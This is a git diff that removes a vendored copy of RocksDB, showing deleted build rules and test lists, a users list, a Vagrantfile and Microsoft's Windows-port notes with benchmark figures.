-      "table/iterator.cc",
-      "table/merging_iterator.cc",
-      "table/meta_blocks.cc",
-      "table/partitioned_filter_block.cc",
-      "table/persistent_cache_helper.cc",
-      "table/plain_table_builder.cc",
-      "table/plain_table_factory.cc",
-      "table/plain_table_index.cc",
-      "table/plain_table_key_coding.cc",
-      "table/plain_table_reader.cc",
-      "table/sst_file_writer.cc",
-      "table/table_properties.cc",
-      "table/two_level_iterator.cc",
-      "tools/dump/db_dump_tool.cc",
-      "util/arena.cc",
-      "util/auto_roll_logger.cc",
-      "util/bloom.cc",
-      "util/build_version.cc",
-      "util/coding.cc",
-      "util/compaction_job_stats_impl.cc",
-      "util/comparator.cc",
-      "util/concurrent_arena.cc",
-      "util/crc32c.cc",
-      "util/delete_scheduler.cc",
-      "util/dynamic_bloom.cc",
-      "util/event_logger.cc",
-      "util/file_reader_writer.cc",
-      "util/file_util.cc",
-      "util/filename.cc",
-      "util/filter_policy.cc",
-      "util/hash.cc",
-      "util/log_buffer.cc",
-      "util/murmurhash.cc",
-      "util/random.cc",
-      "util/rate_limiter.cc",
-      "util/slice.cc",
-      "util/sst_file_manager_impl.cc",
-      "util/status.cc",
-      "util/status_message.cc",
-      "util/string_util.cc",
-      "util/sync_point.cc",
-      "util/thread_local.cc",
-      "util/threadpool_imp.cc",
-      "util/transaction_test_util.cc",
-      "util/xxhash.cc",
-      "utilities/backupable/backupable_db.cc",
-      "utilities/blob_db/blob_db.cc",
-      "utilities/blob_db/blob_db_impl.cc",
-      "utilities/blob_db/blob_file.cc",
-      "utilities/blob_db/blob_log_reader.cc",
-      "utilities/blob_db/blob_log_writer.cc",
-      "utilities/blob_db/blob_log_format.cc",
-      "utilities/blob_db/ttl_extractor.cc",
-      "utilities/cassandra/cassandra_compaction_filter.cc",
-      "utilities/cassandra/format.cc",
-      "utilities/cassandra/merge_operator.cc",
-      "utilities/checkpoint/checkpoint_impl.cc",
-      "utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc",
-      "utilities/convenience/info_log_finder.cc",
-      "utilities/date_tiered/date_tiered_db_impl.cc",
-      "utilities/debug.cc",
-      "utilities/document/document_db.cc",
-      "utilities/document/json_document.cc",
-      "utilities/document/json_document_builder.cc",
-      "utilities/env_mirror.cc",
-      "utilities/env_timed.cc",
-      "utilities/geodb/geodb_impl.cc",
-      "utilities/leveldb_options/leveldb_options.cc",
-      "utilities/lua/rocks_lua_compaction_filter.cc",
-      "utilities/memory/memory_util.cc",
-      "utilities/merge_operators/max.cc",
-      "utilities/merge_operators/put.cc",
-      "utilities/merge_operators/string_append/stringappend.cc",
-      "utilities/merge_operators/string_append/stringappend2.cc",
-      "utilities/merge_operators/uint64add.cc",
-      "utilities/option_change_migration/option_change_migration.cc",
-      "utilities/options/options_util.cc",
-      "utilities/persistent_cache/block_cache_tier.cc",
-      "utilities/persistent_cache/block_cache_tier_file.cc",
-      "utilities/persistent_cache/block_cache_tier_metadata.cc",
-      "utilities/persistent_cache/persistent_cache_tier.cc",
-      "utilities/persistent_cache/volatile_tier_impl.cc",
-      "utilities/redis/redis_lists.cc",
-      "utilities/simulator_cache/sim_cache.cc",
-      "utilities/spatialdb/spatial_db.cc",
-      "utilities/table_properties_collectors/compact_on_deletion_collector.cc",
-      "utilities/transactions/optimistic_transaction_db_impl.cc",
-      "utilities/transactions/optimistic_transaction.cc",
-      "utilities/transactions/transaction_base.cc",
-      "utilities/transactions/pessimistic_transaction_db.cc",
-      "utilities/transactions/transaction_db_mutex_impl.cc",
-      "utilities/transactions/pessimistic_transaction.cc",
-      "utilities/transactions/transaction_lock_mgr.cc",
-      "utilities/transactions/transaction_util.cc",
-      "utilities/transactions/write_prepared_txn.cc",
-      "utilities/ttl/db_ttl_impl.cc",
-      "utilities/write_batch_with_index/write_batch_with_index.cc",
-      "utilities/write_batch_with_index/write_batch_with_index_internal.cc",
-      "tools/ldb_cmd.cc",
-      "tools/ldb_tool.cc",
-      "tools/sst_dump_tool.cc",
-      "utilities/blob_db/blob_dump_tool.cc",
-    ],
-    deps = [],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "rocksdb_test_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "table/mock_table.cc",
-      "util/fault_injection_test_env.cc",
-      "util/testharness.cc",
-      "util/testutil.cc",
-      "db/db_test_util.cc",
-      "utilities/cassandra/test_utils.cc",
-      "utilities/col_buf_encoder.cc",
-      "utilities/col_buf_decoder.cc",
-      "utilities/column_aware_encoding_util.cc",
-    ],
-    deps = [":rocksdb_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "rocksdb_tools_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "tools/db_bench_tool.cc",
-      "util/testutil.cc",
-    ],
-    deps = [":rocksdb_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "env_basic_test_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = ["env/env_basic_test.cc"],
-    deps = [":rocksdb_test_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-# [test_name, test_src, test_type]
-ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'],
- ['auto_roll_logger_test', 'util/auto_roll_logger_test.cc', 'serial'],
- ['autovector_test', 'util/autovector_test.cc', 'serial'],
- ['backupable_db_test',
-  'utilities/backupable/backupable_db_test.cc',
-  'parallel'],
- ['blob_db_test', 'utilities/blob_db/blob_db_test.cc', 'serial'],
- ['block_based_filter_block_test',
-  'table/block_based_filter_block_test.cc',
-  'serial'],
- ['block_test', 'table/block_test.cc', 'serial'],
- ['bloom_test', 'util/bloom_test.cc', 'serial'],
- ['c_test', 'db/c_test.c', 'serial'],
- ['cache_test', 'cache/cache_test.cc', 'serial'],
- ['cassandra_format_test',
-  'utilities/cassandra/cassandra_format_test.cc',
-  'serial'],
- ['cassandra_functional_test',
-  'utilities/cassandra/cassandra_functional_test.cc',
-  'serial'],
- ['cassandra_row_merge_test',
-  'utilities/cassandra/cassandra_row_merge_test.cc',
-  'serial'],
- ['cassandra_serialize_test',
-  'utilities/cassandra/cassandra_serialize_test.cc',
-  'serial'],
- ['checkpoint_test', 'utilities/checkpoint/checkpoint_test.cc', 'serial'],
- ['cleanable_test', 'table/cleanable_test.cc', 'serial'],
- ['coding_test', 'util/coding_test.cc', 'serial'],
- ['column_aware_encoding_test',
-  'utilities/column_aware_encoding_test.cc',
-  'serial'],
- ['column_family_test', 'db/column_family_test.cc', 'serial'],
- ['compact_files_test', 'db/compact_files_test.cc', 'serial'],
- ['compact_on_deletion_collector_test',
-  'utilities/table_properties_collectors/compact_on_deletion_collector_test.cc',
-  'serial'],
- ['compaction_iterator_test', 'db/compaction_iterator_test.cc', 'serial'],
- ['compaction_job_stats_test', 'db/compaction_job_stats_test.cc', 'serial'],
- ['compaction_job_test', 'db/compaction_job_test.cc', 'serial'],
- ['compaction_picker_test', 'db/compaction_picker_test.cc', 'serial'],
- ['comparator_db_test', 'db/comparator_db_test.cc', 'serial'],
- ['corruption_test', 'db/corruption_test.cc', 'serial'],
- ['crc32c_test', 'util/crc32c_test.cc', 'serial'],
- ['cuckoo_table_builder_test', 'table/cuckoo_table_builder_test.cc', 'serial'],
- ['cuckoo_table_db_test', 'db/cuckoo_table_db_test.cc', 'serial'],
- ['cuckoo_table_reader_test', 'table/cuckoo_table_reader_test.cc', 'serial'],
- ['date_tiered_test', 'utilities/date_tiered/date_tiered_test.cc', 'serial'],
- ['db_basic_test', 'db/db_basic_test.cc', 'serial'],
- ['db_blob_index_test', 'db/db_blob_index_test.cc', 'serial'],
- ['db_block_cache_test', 'db/db_block_cache_test.cc', 'serial'],
- ['db_bloom_filter_test', 'db/db_bloom_filter_test.cc', 'serial'],
- ['db_compaction_filter_test', 'db/db_compaction_filter_test.cc', 'parallel'],
- ['db_compaction_test', 'db/db_compaction_test.cc', 'parallel'],
- ['db_dynamic_level_test', 'db/db_dynamic_level_test.cc', 'serial'],
- ['db_encryption_test', 'db/db_encryption_test.cc', 'serial'],
- ['db_flush_test', 'db/db_flush_test.cc', 'serial'],
- ['db_inplace_update_test', 'db/db_inplace_update_test.cc', 'serial'],
- ['db_io_failure_test', 'db/db_io_failure_test.cc', 'serial'],
- ['db_iter_test', 'db/db_iter_test.cc', 'serial'],
- ['db_iterator_test', 'db/db_iterator_test.cc', 'serial'],
- ['db_log_iter_test', 'db/db_log_iter_test.cc', 'serial'],
- ['db_memtable_test', 'db/db_memtable_test.cc', 'serial'],
- ['db_merge_operator_test', 'db/db_merge_operator_test.cc', 'serial'],
- ['db_options_test', 'db/db_options_test.cc', 'serial'],
- ['db_properties_test', 'db/db_properties_test.cc', 'serial'],
- ['db_range_del_test', 'db/db_range_del_test.cc', 'serial'],
- ['db_sst_test', 'db/db_sst_test.cc', 'parallel'],
- ['db_statistics_test', 'db/db_statistics_test.cc', 'serial'],
- ['db_table_properties_test', 'db/db_table_properties_test.cc', 'serial'],
- ['db_tailing_iter_test', 'db/db_tailing_iter_test.cc', 'serial'],
- ['db_test', 'db/db_test.cc', 'parallel'],
- ['db_test2', 'db/db_test2.cc', 'serial'],
- ['db_universal_compaction_test',
-  'db/db_universal_compaction_test.cc',
-  'parallel'],
- ['db_wal_test', 'db/db_wal_test.cc', 'parallel'],
- ['db_write_test', 'db/db_write_test.cc', 'serial'],
- ['dbformat_test', 'db/dbformat_test.cc', 'serial'],
- ['delete_scheduler_test', 'util/delete_scheduler_test.cc', 'serial'],
- ['deletefile_test', 'db/deletefile_test.cc', 'serial'],
- ['document_db_test', 'utilities/document/document_db_test.cc', 'serial'],
- ['dynamic_bloom_test', 'util/dynamic_bloom_test.cc', 'serial'],
- ['env_basic_test', 'env/env_basic_test.cc', 'serial'],
- ['env_test', 'env/env_test.cc', 'serial'],
- ['env_timed_test', 'utilities/env_timed_test.cc', 'serial'],
- ['event_logger_test', 'util/event_logger_test.cc', 'serial'],
- ['external_sst_file_basic_test',
-  'db/external_sst_file_basic_test.cc',
-  'serial'],
- ['external_sst_file_test', 'db/external_sst_file_test.cc', 'parallel'],
- ['fault_injection_test', 'db/fault_injection_test.cc', 'parallel'],
- ['file_indexer_test', 'db/file_indexer_test.cc', 'serial'],
- ['file_reader_writer_test', 'util/file_reader_writer_test.cc', 'serial'],
- ['filelock_test', 'util/filelock_test.cc', 'serial'],
- ['filename_test', 'db/filename_test.cc', 'serial'],
- ['flush_job_test', 'db/flush_job_test.cc', 'serial'],
- ['full_filter_block_test', 'table/full_filter_block_test.cc', 'serial'],
- ['geodb_test', 'utilities/geodb/geodb_test.cc', 'serial'],
- ['hash_table_test',
-  'utilities/persistent_cache/hash_table_test.cc',
-  'serial'],
- ['hash_test', 'util/hash_test.cc', 'serial'],
- ['heap_test', 'util/heap_test.cc', 'serial'],
- ['histogram_test', 'monitoring/histogram_test.cc', 'serial'],
- ['inlineskiplist_test', 'memtable/inlineskiplist_test.cc', 'parallel'],
- ['iostats_context_test', 'monitoring/iostats_context_test.cc', 'serial'],
- ['json_document_test', 'utilities/document/json_document_test.cc', 'serial'],
- ['ldb_cmd_test', 'tools/ldb_cmd_test.cc', 'serial'],
- ['listener_test', 'db/listener_test.cc', 'serial'],
- ['log_test', 'db/log_test.cc', 'serial'],
- ['lru_cache_test', 'cache/lru_cache_test.cc', 'serial'],
- ['manual_compaction_test', 'db/manual_compaction_test.cc', 'parallel'],
- ['memory_test', 'utilities/memory/memory_test.cc', 'serial'],
- ['memtable_list_test', 'db/memtable_list_test.cc', 'serial'],
- ['merge_helper_test', 'db/merge_helper_test.cc', 'serial'],
- ['merge_test', 'db/merge_test.cc', 'serial'],
- ['merger_test', 'table/merger_test.cc', 'serial'],
- ['mock_env_test', 'env/mock_env_test.cc', 'serial'],
- ['object_registry_test', 'utilities/object_registry_test.cc', 'serial'],
- ['optimistic_transaction_test',
-  'utilities/transactions/optimistic_transaction_test.cc',
-  'serial'],
- ['option_change_migration_test',
-  'utilities/option_change_migration/option_change_migration_test.cc',
-  'serial'],
- ['options_file_test', 'db/options_file_test.cc', 'serial'],
- ['options_settable_test', 'options/options_settable_test.cc', 'serial'],
- ['options_test', 'options/options_test.cc', 'serial'],
- ['options_util_test', 'utilities/options/options_util_test.cc', 'serial'],
- ['partitioned_filter_block_test',
-  'table/partitioned_filter_block_test.cc',
-  'serial'],
- ['perf_context_test', 'db/perf_context_test.cc', 'serial'],
- ['persistent_cache_test',
-  'utilities/persistent_cache/persistent_cache_test.cc',
-  'parallel'],
- ['plain_table_db_test', 'db/plain_table_db_test.cc', 'serial'],
- ['prefix_test', 'db/prefix_test.cc', 'serial'],
- ['range_del_aggregator_test', 'db/range_del_aggregator_test.cc', 'serial'],
- ['rate_limiter_test', 'util/rate_limiter_test.cc', 'serial'],
- ['reduce_levels_test', 'tools/reduce_levels_test.cc', 'serial'],
- ['repair_test', 'db/repair_test.cc', 'serial'],
- ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'],
- ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'],
- ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'],
- ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'],
- ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'],
- ['statistics_test', 'monitoring/statistics_test.cc', 'serial'],
- ['stringappend_test',
-  'utilities/merge_operators/string_append/stringappend_test.cc',
-  'serial'],
- ['table_properties_collector_test',
-  'db/table_properties_collector_test.cc',
-  'serial'],
- ['table_test', 'table/table_test.cc', 'parallel'],
- ['thread_list_test', 'util/thread_list_test.cc', 'serial'],
- ['thread_local_test', 'util/thread_local_test.cc', 'serial'],
- ['timer_queue_test', 'util/timer_queue_test.cc', 'serial'],
- ['transaction_test', 'utilities/transactions/transaction_test.cc', 'serial'],
- ['ttl_test', 'utilities/ttl/ttl_test.cc', 'serial'],
- ['util_merge_operators_test',
-  'utilities/util_merge_operators_test.cc',
-  'serial'],
- ['version_builder_test', 'db/version_builder_test.cc', 'serial'],
- ['version_edit_test', 'db/version_edit_test.cc', 'serial'],
- ['version_set_test', 'db/version_set_test.cc', 'serial'],
- ['wal_manager_test', 'db/wal_manager_test.cc', 'serial'],
- ['write_batch_test', 'db/write_batch_test.cc', 'serial'],
- ['write_batch_with_index_test',
-  'utilities/write_batch_with_index/write_batch_with_index_test.cc',
-  'serial'],
- ['write_buffer_manager_test',
-  'memtable/write_buffer_manager_test.cc',
-  'serial'],
- ['write_callback_test', 'db/write_callback_test.cc', 'serial'],
- ['write_controller_test', 'db/write_controller_test.cc', 'serial']]
-
-
-# Generate a test rule for each entry in ROCKS_TESTS
-for test_cfg in ROCKS_TESTS:
-    test_name = test_cfg[0]
-    test_cc = test_cfg[1]
-    ttype = "gtest" if test_cfg[2] == "parallel" else "simple"
-    test_bin = test_name + "_bin"
-
-    cpp_binary (
-      name = test_bin,
-      srcs = [test_cc],
-      deps = [":rocksdb_test_lib"],
-      preprocessor_flags = rocksdb_preprocessor_flags,
-      arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-      compiler_flags = rocksdb_compiler_flags,
-      external_deps = rocksdb_external_deps,
-    )
-
-    custom_unittest(
-      name = test_name,
-      type = ttype,
-      deps = [":" + test_bin],
-      command = [TEST_RUNNER, BUCK_BINS + test_bin]
-    )
-
-custom_unittest(
-    name = "make_rocksdbjavastatic",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdbjavastatic.sh"],
-)
-
-custom_unittest(
-    name = "make_rocksdb_lite_release",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdb_lite_release.sh"],
-)
diff --git a/thirdparty/rocksdb/USERS.md b/thirdparty/rocksdb/USERS.md
deleted file mode 100644
index 7be093f..0000000
--- a/thirdparty/rocksdb/USERS.md
+++ /dev/null
@@ -1,85 +0,0 @@
-This document lists users of RocksDB and their use cases. If you are using RocksDB, please open a pull request and add yourself to the list.
-
-## Facebook
-At Facebook, we use RocksDB as storage engines in multiple data management services and a backend for many different stateful services, including:
-
-1. MyRocks -- https://github.com/MySQLOnRocksDB/mysql-5.6
-2. MongoRocks -- https://github.com/mongodb-partners/mongo-rocks
-3. ZippyDB --  Facebook's distributed key-value store with Paxos-style replication, built on top of RocksDB.[*] https://www.youtube.com/watch?v=DfiN7pG0D0khtt
-4. Laser -- Laser is a high query throughput, low (millisecond) latency, key-value storage service built on top of RocksDB.[*]
-4. Dragon -- a distributed graph query engine. https://code.facebook.com/posts/1737605303120405/dragon-a-distributed-graph-query-engine/
-5. Stylus -- a low-level stream processing framework writtenin C++.[*]
-
-[*] https://research.facebook.com/publications/realtime-data-processing-at-facebook/
-
-## LinkedIn
-Two different use cases at Linkedin are using RocksDB as a storage engine:
-
-1. LinkedIn's follow feed for storing user's activities. Check out the blog post: https://engineering.linkedin.com/blog/2016/03/followfeed--linkedin-s-feed-made-faster-and-smarter
-2. Apache Samza, open source framework for stream processing
-
-Learn more about those use cases in a Tech Talk by Ankit Gupta and Naveen Somasundaram: http://www.youtube.com/watch?v=plqVp_OnSzg
-
-## Yahoo
-Yahoo is using RocksDB as a storage engine for their biggest distributed data store Sherpa. Learn more about it here: http://yahooeng.tumblr.com/post/120730204806/sherpa-scales-new-heights
-
-## CockroachDB
-CockroachDB is an open-source geo-replicated transactional database (still in development). They are using RocksDB as their storage engine. Check out their github: https://github.com/cockroachdb/cockroach
-
-## DNANexus
-DNANexus is using RocksDB to speed up processing of genomics data.
-You can learn more from this great blog post by Mike Lin: http://devblog.dnanexus.com/faster-bam-sorting-with-samtools-and-rocksdb/
-
-## Iron.io
-Iron.io is using RocksDB as a storage engine for their distributed queueing system.
-Learn more from Tech Talk by Reed Allman: http://www.youtube.com/watch?v=HTjt6oj-RL4
-
-## Tango Me
-Tango is using RocksDB as a graph storage to store all users' connection data and other social activity data.
-
-## Turn
-Turn is using RocksDB as a storage layer for their key/value store, serving at peak 2.4MM QPS out of different datacenters.
-Check out our RocksDB Protobuf merge operator at: https://github.com/vladb38/rocksdb_protobuf
-
-## Santanader UK/Cloudera Profession Services
-Check out their blog post: http://blog.cloudera.com/blog/2015/08/inside-santanders-near-real-time-data-ingest-architecture/
-
-## Airbnb
-Airbnb is using RocksDB as a storage engine for their personalized search service. You can learn more about it here: https://www.youtube.com/watch?v=ASQ6XMtogMs
-
-## Pinterest
-Pinterest's Object Retrieval System uses RocksDB for storage: https://www.youtube.com/watch?v=MtFEVEs_2Vo
-
-## Smyte
-[Smyte](https://www.smyte.com/) uses RocksDB as the storage layer for their core key-value storage, high-performance counters and time-windowed HyperLogLog services.
-
-## Rakuten Marketing
-[Rakuten Marketing](https://marketing.rakuten.com/) uses RocksDB as the disk cache layer for the real-time bidding service in their Performance DSP.
-
-## VWO, Wingify
-[VWO's](https://vwo.com/) Smart Code checker and URL helper uses RocksDB to store all the URLs where VWO's Smart Code is installed.
-
-## quasardb
-[quasardb](https://www.quasardb.net) is a high-performance, distributed, transactional key-value database that integrates well with in-memory analytics engines such as Apache Spark. 
-quasardb uses a heavily tuned RocksDB as its persistence layer.
-
-## Netflix
-[Netflix](http://techblog.netflix.com/2016/05/application-data-caching-using-ssds.html) Netflix uses RocksDB on AWS EC2 instances with local SSD drives to cache application data.
-
-## TiKV
-[TiKV](https://github.com/pingcap/tikv) is a GEO-replicated, high-performance, distributed, transactional key-value database. TiKV is powered by Rust and Raft. TiKV uses RocksDB as its persistence layer.
-
-## Apache Flink
-[Apache Flink](https://flink.apache.org/news/2016/03/08/release-1.0.0.html) uses RocksDB to store state locally on a machine.
-
-## Dgraph
-[Dgraph](https://github.com/dgraph-io/dgraph) is an open-source, scalable, distributed, low latency, high throughput Graph database .They use RocksDB to store state locally on a machine.
-
-## Uber
-[Uber](http://eng.uber.com/cherami/) uses RocksDB as a durable and scalable task queue.
-
-## 360 Pika
-[360](http://www.360.cn/) [Pika](https://github.com/Qihoo360/pika) is a nosql compatible with redis. With the huge amount of data stored, redis may suffer for a capacity bottleneck, and pika was born for solving it. It has widely been widely used in many company
-
-## LzLabs
-LzLabs is using RocksDB as a storage engine in their multi-database distributed framework to store application configuration and user data.
diff --git a/thirdparty/rocksdb/Vagrantfile b/thirdparty/rocksdb/Vagrantfile
deleted file mode 100644
index d7c2991..0000000
--- a/thirdparty/rocksdb/Vagrantfile
+++ /dev/null
@@ -1,34 +0,0 @@
-# Vagrant file
-Vagrant.configure("2") do |config|
-
-  config.vm.provider "virtualbox" do |v|
-    v.memory = 4096
-    v.cpus = 2
-  end
-
-  config.vm.define "ubuntu14" do |box|
-    box.vm.box = "ubuntu/trusty64"
-  end
-
-  config.vm.define "centos65" do |box|
-    box.vm.box = "chef/centos-6.5"
-  end
-
-  config.vm.define "FreeBSD10" do |box|
-    box.vm.guest = :freebsd
-    box.vm.box = "robin/freebsd-10"
-    # FreeBSD does not support 'mount_virtualbox_shared_folder', use NFS
-    box.vm.synced_folder ".", "/vagrant", :nfs => true, id: "vagrant-root"
-    box.vm.network "private_network", ip: "10.0.1.10"
-
-    # build everything after creating VM, skip using --no-provision
-    box.vm.provision "shell", inline: <<-SCRIPT
-      pkg install -y gmake clang35
-      export CXX=/usr/local/bin/clang++35
-      cd /vagrant
-      gmake clean
-      gmake all OPT=-g
-    SCRIPT
-  end
-
-end
diff --git a/thirdparty/rocksdb/WINDOWS_PORT.md b/thirdparty/rocksdb/WINDOWS_PORT.md
deleted file mode 100644
index a0fe1fe..0000000
--- a/thirdparty/rocksdb/WINDOWS_PORT.md
+++ /dev/null
@@ -1,228 +0,0 @@
-# Microsoft Contribution Notes
-
-## Contributors
-* Alexander Zinoviev https://github.com/zinoale
-* Dmitri Smirnov https://github.com/yuslepukhin
-* Praveen Rao  https://github.com/PraveenSinghRao
-* Sherlock Huang  https://github.com/SherlockNoMad
-
-## Introduction
-RocksDB is a well proven open source key-value persistent store, optimized for fast storage. It provides scalability with number of CPUs and storage IOPS, to support IO-bound, in-memory and write-once workloads, most importantly, to be flexible to allow for innovation.
-
-As Microsoft Bing team we have been continuously pushing hard to improve the scalability, efficiency of platform and eventually benefit Bing end-user satisfaction.  We would like to explore the opportunity to embrace open source, RocksDB here, to use, enhance and customize for our usage, and also contribute back to the RocksDB community. Herein, we are pleased to offer this RocksDB port for Windows platform.
-
-These notes describe some decisions and changes we had to make with regards to porting RocksDB on Windows. We hope this will help both reviewers and users of the Windows port.
-We are open for comments and improvements.
-
-## OS specifics
-All of the porting, testing and benchmarking was done on Windows Server 2012 R2 Datacenter 64-bit but to the best of our knowledge there is not a specific API we used during porting that is unsupported on other Windows OS after Vista.
-
-## Porting goals
-We strive to achieve the following goals:
-* make use of the existing porting interface of RocksDB
-* make minimum [WY2]modifications within platform independent code.
-* make all unit test pass both in debug and release builds. 
-  * Note: latest introduction of SyncPoint seems to disable running db_test in Release.
-* make performance on par with published benchmarks accounting for HW differences
-* we would like to keep the port code inline with the master branch with no forking
-
-## Build system
-We have chosen CMake as a widely accepted build system to build the Windows port. It is very fast and convenient. 
-
-At the same time it generates Visual Studio projects that are both usable from a command line and IDE.
-
-The top-level CMakeLists.txt file contains description of all targets and build rules. It also provides brief instructions on how to build the software for Windows. One more build related file is thirdparty.inc that also resides on the top level. This file must be edited to point to actual third party libraries location.
-We think that it would be beneficial to merge the existing make-based build system and the new cmake-based build system into a single one to use on all platforms.
-
-All building and testing was done for 64-bit. We have not conducted any testing for 32-bit and early reports indicate that it will not run on 32-bit.
-
-## C++ and STL notes
-We had to make some minimum changes within the portable files that either account for OS differences or the shortcomings of C++11 support in the current version of the MS compiler. Most or all of them are expected to be fixed in the upcoming compiler releases.
-
-We plan to use this port for our business purposes here at Bing and this provided business justification for this port. This also means, we do not have at present to choose the compiler version at will.
-
-* Certain headers that are not present and not necessary on Windows were simply `#ifndef OS_WIN` in a few places (`unistd.h`)
-* All posix specific headers were replaced to port/port.h which worked well
-* Replaced `dirent.h` for `port/dirent.h` (very few places) with the implementation of the relevant interfaces within `rocksdb::port` namespace
-* Replaced `sys/time.h` to `port/sys_time.h` (few places) implemented equivalents within `rocksdb::port`
-* `printf %z` specification is not supported on Windows. To imitate existing standards we came up with a string macro `ROCKSDB_PRIszt` which expands to `%z` on posix systems and to Iu on windows.
-* in class member initialization were moved to a __ctors in some cases
-* `constexpr` is not supported. We had to replace `std::numeric_limits<>::max/min()` to its C macros for constants. Sometimes we had to make class members `static const` and place a definition within a .cc file.
-* `constexpr` for functions was replaced to a template specialization (1 place)
-* Union members that have non-trivial constructors were replaced to `char[]` in one place along with bug fixes (spatial experimental feature)
-* Zero-sized arrays are deemed a non-standard extension which we converted to 1 size array and that should work well for the purposes of these classes.
-* `std::chrono` lacks nanoseconds support (fixed in the upcoming release of the STL) and we had to use `QueryPerfCounter()` within env_win.cc
-* Function local statics initialization is still not safe. Used `std::once` to mitigate within WinEnv.
-
-## Windows Environments notes
-We endeavored to make it functionally on par with posix_env. This means we replicated the functionality of the thread pool and other things as precise as possible, including:
-* Replicate posix logic using std:thread primitives.
-* Implement all posix_env disk access functionality.
-* Set `use_os_buffer=false` to disable OS disk buffering for WinWritableFile and WinRandomAccessFile.
-* Replace `pread/pwrite` with `WriteFile/ReadFile` with `OVERLAPPED` structure.
-* Use `SetFileInformationByHandle` to compensate absence of `fallocate`.
-
-### In detail
-Even though Windows provides its own efficient thread-pool implementation we chose to replicate posix logic using `std::thread` primitives. This allows anyone to quickly detect any changes within the posix source code and replicate them within windows env. This has proven to work very well. At the same time for anyone who wishes to replace the built-in thread-pool can do so using RocksDB stackable environments.
-
-For disk access we implemented all of the functionality present within the posix_env which includes memory mapped files, random access, rate-limiter support etc.
-The `use_os_buffer` flag on Posix platforms currently denotes disabling read-ahead log via `fadvise` mechanism. Windows does not have `fadvise` system call. What is more, it implements disk cache in a way that differs from Linux greatly. ItÂ’s not an uncommon practice on Windows to perform un-buffered disk access to gain control of the memory consumption. We think that in our use case this may also be a good configuration option at the expense of disk throughput. To compensate one may increase the configured in-memory cache size instead. Thus we have chosen  `use_os_buffer=false` to disable OS disk buffering for `WinWritableFile` and `WinRandomAccessFile`. The OS imposes restrictions on the alignment of the disk offsets, buffers used and the amount of data that is read/written when accessing files in un-buffered mode. When the option is true, the classes behave in a standard way. This allows to perform writes and reads in cases when un-buffered access does not make sense such as WAL and MANIFEST.
-
-We have replaced `pread/pwrite` with `WriteFile/ReadFile` with `OVERLAPPED` structure so we can atomically seek to the position of the disk operation but still perform the operation synchronously. Thus we able to emulate that functionality of `pread/pwrite` reasonably well. The only difference is that the file pointer is not returned to its original position but that hardly matters given the random nature of access.
-
-We used `SetFileInformationByHandle` both to truncate files after writing a full final page to disk and to pre-allocate disk space for faster I/O thus compensating for the absence of `fallocate` although some differences remain. For example, the pre-allocated space is not filled with zeros like on Linux, however, on a positive note, the end of file position is also not modified after pre-allocation.
-
-RocksDB renames, copies and deletes files at will even though they may be opened with another handle at the same time. We had to relax and allow nearly all the concurrent access permissions possible.
-
-## Thread-Local Storage
-Thread-Local storage plays a significant role for RocksDB performance. Rather than creating a separate implementation we chose to create inline wrappers that forward `pthread_specific` calls to Windows `Tls` interfaces within `rocksdb::port` namespace. This leaves the existing meat of the logic in tact and unchanged and just as maintainable.
-
-To mitigate the lack of thread local storage cleanup on thread-exit we added a limited amount of windows specific code within the same thread_local.cc file that injects a cleanup callback into a `"__tls"` structure within `".CRT$XLB"` data segment. This approach guarantees that the callback is invoked regardless of whether RocksDB used within an executable, standalone DLL or within another DLL.
-
-## Jemalloc usage
-
-When RocksDB is used with Jemalloc the latter needs to be initialized before any of the C++ globals or statics. To accomplish that we injected an initialization routine into `".CRT$XCT"` that is automatically invoked by the runtime before initializing static objects. je-uninit is queued to `atexit()`. 
-
-The jemalloc redirecting `new/delete` global operators are used by the linker providing certain conditions are met. See build section in these notes.
-
-## Stack Trace and Unhandled Exception Handler
-
-We decided not to implement these two features because the hosting program as a rule has these two things in it.
-We experienced no inconveniences debugging issues in the debugger or analyzing process dumps if need be and thus we did not
-see this as a priority.
-
-## Performance results
-### Setup
-All of the benchmarks are run on the same set of machines. Here are the details of the test setup:
-* 2 Intel(R) Xeon(R) E5 2450 0 @ 2.10 GHz (total 16 cores)
-* 2 XK0480GDQPH SSD Device, total 894GB free disk
-* Machine has 128 GB of RAM
-* Operating System: Windows Server 2012 R2 Datacenter
-* 100 Million keys; each key is of size 10 bytes, each value is of size 800 bytes
-* total database size is ~76GB
-* The performance result is based on RocksDB 3.11.
-* The parameters used, unless specified, were exactly the same as published in the GitHub Wiki page. 
-
-### RocksDB on flash storage
-
-#### Test 1. Bulk Load of keys in Random Order
-
-Version 3.11 
-
-* Total Run Time: 17.6 min
-* Fillrandom: 5.480 micros/op 182465 ops/sec;  142.0 MB/s
-* Compact: 486056544.000 micros/op 0 ops/sec
-
-Version 3.10 
-
-* Total Run Time: 16.2 min 
-* Fillrandom: 5.018 micros/op 199269 ops/sec;  155.1 MB/s 
-* Compact: 441313173.000 micros/op 0 ops/sec; 
-
-
